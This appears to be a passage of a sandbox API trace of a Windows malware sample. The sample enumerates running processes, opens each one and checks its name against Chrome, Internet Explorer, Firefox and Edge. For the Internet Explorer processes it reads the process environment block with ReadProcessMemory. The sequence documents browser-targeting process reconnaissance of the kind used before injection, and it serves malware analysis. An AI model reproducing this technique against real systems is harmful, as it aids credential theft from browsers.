	[0247.836] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0247.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9a18
	[0247.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.837] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0247.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.840] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.841] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0247.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.841] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0247.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9a1c
	[0247.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.843] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0247.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.843] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.844] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0247.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.844] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0247.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9a20
	[0247.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.845] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0247.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.846] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.846] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0247.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.847] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0247.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9a24
	[0247.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.848] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0247.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.848] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.849] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0247.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.850] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0247.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9a28
	[0247.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.851] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0247.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.852] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.853] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0247.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.854] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0247.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9a2c
	[0247.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.856] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0247.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.856] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.858] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0247.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.858] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0247.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9a30
	[0247.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.860] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0247.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.861] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.862] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0247.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.862] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.863] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0247.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9a34
	[0247.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.864] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0247.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.864] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.865] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0247.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.865] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9a38
	[0247.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.867] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.867] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.867] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.868] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.868] NtQueryInformationProcess (in: ProcessHandle=0x9a38, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.868] ReadProcessMemory (in: hProcess=0x9a38, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.868] ReadProcessMemory (in: hProcess=0x9a38, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.868] ReadProcessMemory (in: hProcess=0x9a38, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.868] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9a3c
	[0247.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.870] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.870] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.870] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.871] NtQueryInformationProcess (in: ProcessHandle=0x9a3c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.871] ReadProcessMemory (in: hProcess=0x9a3c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.871] ReadProcessMemory (in: hProcess=0x9a3c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.871] ReadProcessMemory (in: hProcess=0x9a3c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.871] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9a40
	[0247.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.873] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.873] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.874] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.874] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.874] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0247.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9a44
	[0247.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.876] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0247.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.876] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.877] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0247.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.877] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9a48
	[0247.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.879] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.879] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.880] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9a4c
	[0247.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.882] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.882] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.883] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.883] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9a50
	[0247.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.884] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.886] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.886] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.887] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.887] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9a54
	[0247.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.888] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.888] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.889] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.889] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.889] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9a58
	[0247.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.890] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.891] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.891] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.891] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9a5c
	[0247.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.893] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.893] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.894] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.894] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.894] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0247.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9a60
	[0247.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.896] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0247.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.896] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.896] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0247.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.897] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0247.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9a64
	[0247.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.898] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.899] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.899] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.900] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0247.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9a68
	[0247.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.901] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0247.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.902] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.902] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0247.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.903] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9a6c
	[0247.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.904] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.904] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.905] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.905] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0247.907] CloseHandle (hObject=0x4fd0) returned 1
	[0247.907] Sleep (dwMilliseconds=0x64) 
	[0248.011] GetCurrentProcessId () returned 0x110
